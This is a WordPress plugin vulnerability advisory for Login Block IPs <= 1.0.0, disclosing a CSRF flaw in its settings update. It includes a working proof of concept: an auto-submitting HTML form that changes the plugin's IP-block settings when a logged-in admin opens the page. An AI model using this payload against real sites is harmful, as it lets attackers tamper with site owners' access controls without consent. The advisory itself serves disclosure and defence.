WordPress Plugin Vulnerabilities
Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
Make a logged in admin open a page containing the HTML code below <form id="test" action="https://example.com/wp-admin/admin.php?page=login-block-ips%2Fadmin%2Fpartials%2Flogin-block-ips-admin-display.php" method="POST"> <input type="text" name="login-block-ips-form" value="1"> <input type="text" name="security_code" value="fff"> <input type="text" name="ip1" value="4.4.4.4"> <input type="text" name="ipdesc1" value="test4"> <input type="text" name="ip2" value=""> <input type="text" name="ipdesc2" value=""> <input type="text" name="ip3" value=""> <input type="text" name="ipdesc3" value=""> <input type="text" name="ip4" value=""> <input type="text" name="ipdesc4" value=""> <input type="text" name="ip5" value=""> <input type="text" name="ipdesc5" value=""> <input type="text" name="ip6" value=""> <input type="text" name="ipdesc6" value=""> <input type="text" name="ip7" value=""> <input type="text" name="ipdesc7" value=""> <input type="text" name="ip8" value=""> <input type="text" name="ipdesc8" value=""> <input type="text" name="ip9" value=""> <input type="text" name="ipdesc9" value=""> <input type="text" name="ip10" value=""> <input type="text" name="ipdesc10" value=""> <input type="text" name="ip11" value=""> <input type="text" name="ipdesc11" value=""> <input type="text" name="ip12" value=""> <input type="text" name="ipdesc12" value=""> <input type="text" name="ip13" value=""> <input type="text" name="ipdesc13" value=""> <input type="text" name="ip14" value=""> <input type="text" name="ipdesc14" value=""> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2022-09-05 (about 1 years ago)